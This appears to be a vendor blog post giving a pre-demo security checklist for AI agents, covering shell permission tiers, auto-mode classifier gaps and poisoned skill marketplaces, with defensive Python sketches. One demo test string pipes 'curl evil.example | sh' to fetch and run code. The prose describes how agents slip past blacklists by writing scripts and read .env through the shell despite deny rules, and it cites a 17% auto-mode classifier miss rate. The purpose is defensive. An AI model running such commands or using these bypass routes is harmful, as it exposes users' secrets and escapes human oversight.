The Agentic Security Checklist: Lock Down Your AI Agent Before the Enterprise Demo

An enterprise buyer will ask one question you can't bluff: "What can this agent actually do on a machine?" This is the pre-demo checklist — shell permission tiers, the auto-mode blind spot, and the skill-marketplace supply chain — so you walk in able to answer it.

See how Knotie scopes agent access
01

Why this checklist exists

You can demo a slick agent that books appointments, edits files, and runs commands. The moment the room has a security lead in it, the questions change. Not "does it work" — "what's the blast radius if it goes wrong, and who decided that?" If your honest answer is "it can run any shell command and I trust the model not to," you've lost the deal before the demo ends. The good news: the controls are concrete and you can put them in place in an afternoon. This is the list to run BEFORE you walk in — three risk areas, each with a fix you can show on screen.

  • Risk 1 — Shell access: what can the agent actually execute, and what stops it?
  • Risk 2 — Auto / no-confirm modes: who approves dangerous actions when nobody's watching?
  • Risk 3 — Third-party skills/plugins: whose code did you just give your agent's permissions to?
02

Risk 1 — Shell access: the 5 permission levels (and which one you can defend)

The most useful framing here comes from engineer Daniel Isler (IndyDevDan), who maps bash-tool security for coding agents onto five levels — each one trusting something different. It transfers cleanly to ANY agent you deploy for a client. Walk up the ladder until you hit the level you'd be comfortable demoing to a CISO. Most DIY agents sit at Level 1 or 2 and don't know it.

Level | Control | What it trusts
L1 | Rules in a skill / instructions file | The model's own judgement (it can override itself)
L2 | Same rules in the system prompt | The model again: louder, same attack surface
L3 | Blacklist hook: regex blocks dangerous commands before they run | Your imagination (agent can write a script and run THAT)
L4 | Whitelist hook: deny all shell, allow ~10 exact patterns (e.g. only npm test) | Your discipline in maintaining the allow-list
L5 | No raw shell at all, purpose-built tools only (run_tests, git_status) | Only what you built. Nothing else is callable

Source-checked: the 5-level model is Daniel Isler's (github.com/disler/bash-damage-from-within). His one-line summary — "L1/L2 trust the model, L3 trusts your imagination, L4 trusts your discipline, L5 trusts only what you built." For an enterprise demo, be at L4 minimum; L5 is what you say when they push.
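
To make Level 5 concrete, here is a minimal Python sketch of "purpose-built tools only." The tool names run_tests and git_status come from the table above; the TOOLS registry, the call_tool dispatcher, and the exact npm and git arguments are assumptions for illustration, not code from Isler's repo. The point is structural: there is no code path that accepts a command string from the agent.

```python
import subprocess
from typing import Callable, Dict, List


def _run_fixed(argv: List[str]) -> str:
    """Run a hard-coded argument list. No shell is involved, so the agent
    cannot smuggle in pipes, redirects, or extra commands."""
    result = subprocess.run(argv, capture_output=True, text=True, timeout=300)
    return result.stdout + result.stderr


def run_tests() -> str:
    # Assumed test command; swap in whatever your project actually uses.
    return _run_fixed(["npm", "test"])


def git_status() -> str:
    return _run_fixed(["git", "status", "--short"])


# Hypothetical registry: the only things the agent is able to call.
TOOLS: Dict[str, Callable[[], str]] = {
    "run_tests": run_tests,
    "git_status": git_status,
}


def call_tool(name: str) -> str:
    """Dispatch by exact tool name; anything else is refused."""
    if name not in TOOLS:
        raise PermissionError(f"tool not available: {name!r}")
    return TOOLS[name]()
```

If the agent asks for anything outside the registry, including a raw command like "rm -rf /", call_tool raises PermissionError before any process is started. That refusal is the thing to show on screen.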
03

The Level-3 trap, with a worked example

Blacklists feel safe and aren't. Say you block destructive commands with a regex hook that denies anything matching rm -rf. Looks airtight. But the agent isn't limited to typing that string — it can write a two-line Python file that does the same deletion and then run python cleanup.py, which sails straight past your rm -rf rule. That's the whole reason Level 4 inverts the logic: instead of guessing every bad command (impossible), you allow a short list of known-good ones and deny everything else by default. Same idea as a firewall: default-deny beats blacklist-everything.

  • Blacklist (L3): deny what you can think of → misses what you didn't (scripts, aliases, encodings).
  • Whitelist (L4): allow ~10 exact, anchored patterns → everything else is denied automatically.
  • Bonus, verified: a deniedPaths rule that blocks Read(./.env) does NOT block cat .env via the shell — the path rule isn't enforced on bash (anthropics/claude-code issue #45992). Test your OWN deny rules through the shell before you trust them.
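
The trap is easy to reproduce. The sketch below is a toy, not any real agent framework's hook API: blacklist_allows and allowlist_allows are hypothetical names, and the three allow-list patterns are assumed examples. It shows the same python cleanup.py command passing a Level 3 blacklist and being denied by a Level 4 allow-list.

```python
import re

# Level 3: deny what you thought of.
BLACKLIST = [re.compile(r"\brm\s+-rf\b")]


def blacklist_allows(command: str) -> bool:
    """Allowed unless some blacklist pattern appears anywhere in the command."""
    return not any(p.search(command) for p in BLACKLIST)


# Level 4: allow a short list of exact commands, deny everything else.
ALLOWLIST = [
    re.compile(r"npm test"),
    re.compile(r"git status"),
    re.compile(r"git diff( --stat)?"),
]


def allowlist_allows(command: str) -> bool:
    """Allowed only if the WHOLE command matches a pattern (fullmatch anchors
    both ends, so 'npm test && something-else' does not qualify)."""
    return any(p.fullmatch(command) for p in ALLOWLIST)


for cmd in [
    "rm -rf build",
    "python cleanup.py",
    "npm test",
    "npm test && curl evil.example | sh",
]:
    print(f"{cmd!r}: blacklist={blacklist_allows(cmd)} allowlist={allowlist_allows(cmd)}")
```

The anchoring matters as much as the list. A pattern checked with search instead of fullmatch would wave through anything that merely contains "npm test".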
04

Risk 2 — Auto-mode and no-confirm: the blind spot to disclose

"It runs fully autonomously, no babysitting" sounds great in a pitch and terrifying to a security buyer. Skipping the human-in-the-loop means a classifier — not a person — decides whether each action is safe. Those classifiers are good, not perfect, and the honest move is to know the number. When Anthropic built auto-mode for Claude Code, they published their own evaluation: on a set of REAL over-eager actions, the full safety pipeline still let through about 17% — roughly one in six genuinely-dangerous, beyond-authorization actions slipped past. Their own words: auto-mode "is not a drop-in replacement for careful human review on high-stakes infrastructure." That's not a reason to never use it. It's the reason a confirmation step belongs on anything irreversible.

  • Reported figure (Anthropic's own post): ~17% false-negative on a sample of real over-eager actions, full pipeline — not a blanket "misses 17% of everything," but enough to matter.
  • The misses were usually the classifier KNOWING an action was risky but mis-judging whether the user had consented to it.
  • Pre-demo move: list your agent's irreversible actions (delete, send money, email a client, push to prod) and require an explicit confirm on each — even in auto-mode.
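
One way to wire that pre-demo move in is a small gate in front of action execution. This is a sketch under assumptions: the action names in IRREVERSIBLE, the execute function, and the confirm callback are all hypothetical, and a real deployment would hook into whatever approval mechanism your agent runtime provides.

```python
from typing import Callable

# Hypothetical action names; replace with your agent's real irreversible actions.
IRREVERSIBLE = {"delete", "send_money", "email_client", "push_to_prod"}


def execute(
    action: str,
    run: Callable[[], str],
    confirm: Callable[[str], bool],
    auto_mode: bool = True,
) -> str:
    """Run an action, asking a human first when it is irreversible.

    In auto mode, reversible actions run without a prompt. Irreversible
    actions always go through confirm(), whatever the mode.
    """
    needs_confirm = action in IRREVERSIBLE or not auto_mode
    if needs_confirm and not confirm(action):
        return f"blocked: {action} was not confirmed"
    return run()
```

In a demo, confirm could be as simple as a function that prints the action and reads y/n from the terminal. What the buyer needs to see is that auto_mode=True does not bypass it for the actions on the list.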
05

Risk 3 — Third-party skills & plugins: an unaudited supply chain

Every skill or plugin you install runs with your agent's permissions. A marketplace makes that one click — and that's exactly the problem. In early 2026, the OpenClaw skill marketplace (ClawHub) was hit by a poisoning campaign nicknamed ClawHavoc: security firm Koi Security audited 2,857 skills and flagged 341 as malicious — roughly one in eight — with the bulk traced to a single coordinated operation. The payload on macOS was an info-stealer that lifted credentials, keychains, and crypto wallets, often by tricking the user into pasting a base64 command. (Other audits put the malicious rate higher; the exact percentage is contested, but the lesson isn't.) Treat a third-party skill registry the way you'd treat npm or PyPI: useful, and an attack surface.

  • Pin versions. Don't auto-update skills/plugins into a client environment.
  • Read what it can reach — file paths, network, secrets — before granting it. If it wants your .env, that's the whole game.
  • Prefer first-party or audited skills for anything touching a customer. A clever skill isn't worth a stealer in your customer's stack.
Source-checked: ClawHavoc is real and widely reported (Koi Security, Antiy CERT, Trend Micro). We use Koi's 341/2,857 figure and explicitly flag that the exact rate varies by audit — we will not hand you a single scary number as gospel.
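
"Pin versions" can be enforced mechanically rather than by habit. The sketch below assumes a hypothetical lockfile, here a plain dict mapping each skill name to a pinned version and the SHA-256 of the bundle you actually reviewed. It is not ClawHub's or any marketplace's real format. A skill loads only if both the version and the hash match.

```python
import hashlib
from typing import Dict, Tuple

# Hypothetical lock format: skill name -> (pinned version, sha256 hex digest)
Lock = Dict[str, Tuple[str, str]]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_skill(name: str, version: str, bundle: bytes, lock: Lock) -> bool:
    """Return True only for a skill that was reviewed and has not changed since."""
    pinned = lock.get(name)
    if pinned is None:
        return False  # never reviewed: default-deny
    pinned_version, pinned_digest = pinned
    return version == pinned_version and sha256_hex(bundle) == pinned_digest
```

The version check stops silent auto-updates. The hash check catches the case where the same version number is republished with different contents.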
06

The pre-demo checklist (print this, run it the morning of)

Ten minutes, the morning of the demo. Every box you can tick is an answer you can give with a straight face.

  1. Shell: am I at Level 4 (whitelist) or Level 5 (no raw shell)? If I'm at L1–L3, raise it before the demo.
  2. Prove it: try one off-list command live and show it gets denied. A working denial is the best slide.
  3. deniedPaths: test a denied path THROUGH the shell (cat / grep), not just the file tool — confirm it's actually blocked.
  4. Auto-mode: is there a human-confirm step on every irreversible action? List them out loud: delete, pay, send, deploy.
  5. Sandbox: is the agent in an isolated container/VM with scoped network, not on a machine with prod creds in env?
  6. Skills/plugins: are all third-party skills pinned, reviewed, and from a source I'd vouch for?
  7. Secrets: are API keys scoped (least-privilege, per-customer) and rotatable — or is one god-key wired in?
  8. Blast-radius answer: can I say, in one sentence, the worst thing this agent can do — and why that's acceptable?
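
For items 5 and 7, a quick sanity check is to look at what the agent's process can actually see. The sketch below is a rough heuristic, not a secret scanner: the SECRET_NAME pattern and the secret_like_names helper are assumptions, and the check only inspects variable names, never values.

```python
import os
import re
from typing import List, Mapping

# Assumed naming heuristic; extend it for your own conventions.
SECRET_NAME = re.compile(r"(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL)", re.IGNORECASE)


def secret_like_names(env: Mapping[str, str]) -> List[str]:
    """List environment variable names that look like credentials."""
    return sorted(name for name in env if SECRET_NAME.search(name))


if __name__ == "__main__":
    # Run this INSIDE the agent's sandbox, as the agent's user.
    for name in secret_like_names(os.environ):
        print(f"visible to the agent: {name}")
```

An empty list doesn't prove the sandbox is clean, since secrets can also sit in files or metadata endpoints. A non-empty list is something to explain or fix before the demo.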

Frequently asked questions

What's the single most important agentic security control before an enterprise demo?
Get off raw shell access. Move from "the agent can run any command" (Levels 1–3) to a whitelist of allowed commands (Level 4) or purpose-built tools with no shell at all (Level 5). Being able to show an off-list command getting denied, live, answers the buyer's real question — what's the blast radius — better than any slide.
Is a blacklist of dangerous commands good enough?
No, and that's the trap. A blacklist (e.g. block rm -rf) only stops commands you thought of. The agent can write a short script that does the same thing and run that, sailing past your rule. Invert it: default-deny, then allow a short list of known-good commands. Same principle as a firewall.
How risky is letting an agent run in fully-automatic, no-confirm mode?
Risky enough to disclose, not so risky you never use it. In Anthropic's own evaluation of Claude Code auto-mode, the full safety pipeline still let through about 17% of a set of real over-eager actions — roughly one in six dangerous, beyond-authorization actions. The fix isn't to ban auto-mode; it's to require an explicit human confirm on anything irreversible (delete, payment, outbound message, deploy).
Are third-party agent skills and plugins safe to install?
Treat them like any package registry: useful and an attack surface. In early 2026 the ClawHub skill marketplace was hit by a poisoning campaign (ClawHavoc) — Koi Security flagged 341 of 2,857 audited skills as malicious, most from one operation, dropping an info-stealer on macOS. Pin versions, read what each skill can reach (files, network, secrets), and prefer first-party or audited skills for anything touching a customer.
What does "sandboxing" actually mean for an AI agent?
Running the agent in an isolated environment — a container or VM with a scoped filesystem and limited network — so that even if it does something wrong, it can't reach production credentials, customer data, or the wider machine. The opposite is running an agent directly on a box that has god-mode API keys sitting in its environment. Scope the keys per-customer and least-privilege so a single leak isn't fatal.

Sources

  • IndyDevDan: bash-damage-from-within (the 5-level bash security model)
  • IndyDevDan: "Engineers, DELETE the BASH Tool" (YouTube)
  • Anthropic: How we built Claude Code auto mode (the 17% figure, in context)
  • anthropics/claude-code #45992: deniedPaths not enforced for Bash
  • eSecurityPlanet: Hundreds of Malicious Skills Found in OpenClaw's ClawHub (Koi Security figures)
  • Trend Micro: Malicious OpenClaw Skills Used to Distribute Atomic macOS Stealer

Where this checklist gets hardest: deploying agents for clients

Running this list on your own laptop is one thing. Running it across every AI agent you deploy for paying customers — scoped shell, per-customer least-privilege keys, no shared god-key, isolation between tenants — is the part that quietly eats your week. That's the boring infrastructure Knotie is built around: spin up voice and chat agents under your own brand and domain across multiple providers, with scoped access, bring-your-own-key, and credit billing, so the guardrails are there by default instead of something you bolt on per client. Build it secure from day one rather than retrofitting it the night before a demo.
